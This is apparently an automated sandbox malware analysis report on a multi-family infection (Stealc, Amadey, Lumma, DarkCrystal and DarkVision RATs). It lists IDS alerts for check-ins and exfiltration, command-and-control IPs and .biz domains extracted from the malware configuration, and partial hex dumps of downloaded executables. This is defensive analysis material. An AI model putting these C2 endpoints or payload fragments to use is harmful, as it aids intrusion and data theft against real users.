Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:49989 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:49993 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:49995 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50007 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50006 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:50045 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.9:443 -> 192.168.2.4:50061 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50093 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50096 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2126531064.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: wextract.pdb source: ntRoEwh.exe, 0000001A.00000000.2530156502.00007FF6D9529000.00000002.00000001.01000000.00000014.sdmp, ntRoEwh.exe, 0000001A.00000002.2953474777.00007FF6D9529000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: mountvol.pdb source: wTMEVe8.exe, 00000010.00000002.2455002578.0000000000400000.00000040.00000400.00020000.00000000.sdmp, XXgM7ZsSvR.exe, 00000011.00000000.2453810245.00007FF6EBBC4000.00000002.00000001.01000000.00000010.sdmp, XXgM7ZsSvR.exe, 00000011.00000002.2455244887.00007FF6EBBC4000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: wextract.pdbGCTL source: ntRoEwh.exe, 0000001A.00000000.2530156502.00007FF6D9529000.00000002.00000001.01000000.00000014.sdmp, ntRoEwh.exe, 0000001A.00000002.2953474777.00007FF6D9529000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: mountvol.pdbGCTL source: wTMEVe8.exe, 00000010.00000002.2455002578.0000000000400000.00000040.00000400.00020000.00000000.sdmp, XXgM7ZsSvR.exe, 00000011.00000000.2453810245.00007FF6EBBC4000.00000002.00000001.01000000.00000010.sdmp, XXgM7ZsSvR.exe, 00000011.00000002.2455244887.00007FF6EBBC4000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: callmobile.exe, 0000001B.00000002.3358250427.0000000005C40000.00000004.08000000.00040000.00000000.sdmp, callmobile.exe, 0000001B.00000002.3325178734.0000000004178000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2126531064.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: protobuf-net.pdb source: callmobile.exe, 0000001B.00000002.3358250427.0000000005C40000.00000004.08000000.00040000.00000000.sdmp, callmobile.exe, 0000001B.00000002.3325178734.0000000004178000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: -.PDB source: explorer.exe, 00000027.00000003.2805473467.0000000003B06000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2827321183.00000000044F1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000002.2964209931.0000000003C30000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2834435398.00000000046E4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2848745989.0000000004059000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2816470410.0000000004051000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 40MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49730 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49766 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49772
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49804 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49838 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49839 -> 77.73.39.158:80
Source: Network traffic	Suricata IDS: 2057921 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz) : 192.168.2.4:53951 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49862 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49863 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49870 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49826 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2048130 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST) : 192.168.2.4:49855 -> 77.73.39.158:80
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49880 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49893 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49896 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49907 -> 185.157.162.216:5200
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49906 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.4:49907 -> 185.157.162.216:5200
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49932 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49921 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49934 -> 185.157.162.216:5200
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49922 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49929 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49945 -> 185.157.162.216:5200
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49946 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49948 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49961 -> 185.157.162.216:5200
Source: Network traffic	Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:49985 -> 185.157.162.216:5200
Source: Network traffic	Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.4:50005 -> 185.157.162.216:5200
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:49989 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49984 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:50045 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.4:50061 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:50069 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49862 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49862 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2022482 - Severity 1 - ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01 : 192.168.2.4:49895 -> 154.216.20.243:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49893 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49870 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2021954 - Severity 1 - ET MALWARE JS/Nemucod.M.gen downloading EXE payload : 154.216.20.243:443 -> 192.168.2.4:49895
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49870 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2044697 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M3 : 192.168.2.4:49937 -> 154.216.20.243:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49932 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49946 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49932 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49946 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50045 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50045 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50061 -> 104.21.16.9:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50061 -> 104.21.16.9:443

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 5.188.137.200 3333
Source: C:\Windows\explorer.exe	Network Connect: 154.216.20.243 443
Source: C:\Windows\explorer.exe	Network Connect: 185.157.162.216 5200

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor	URLs: formy-spill.biz
Source: Malware configuration extractor	URLs: print-vexer.biz
Source: Malware configuration extractor	URLs: dare-curbys.biz
Source: Malware configuration extractor	URLs: zinc-sneark.biz
Source: Malware configuration extractor	URLs: se-blurry.biz
Source: Malware configuration extractor	URLs: covery-mover.biz
Source: Malware configuration extractor	URLs: impend-differ.biz
Source: Malware configuration extractor	URLs: atten-supporse.biz
Source: Malware configuration extractor	URLs: dwell-exclaim.biz
Source: Malware configuration extractor	IPs: 185.215.113.43
Source: Malware configuration extractor	IPs: 185.157.162.216

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: global traffic	TCP traffic: 192.168.2.4:49907 -> 185.157.162.216:5200
Source: global traffic	TCP traffic: 192.168.2.4:49935 -> 5.188.137.200:3333

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 08 Dec 2024 18:52:06 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 08 Dec 2024 18:52:23 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 08 Dec 2024 18:52:25 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 08 Dec 2024 18:52:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 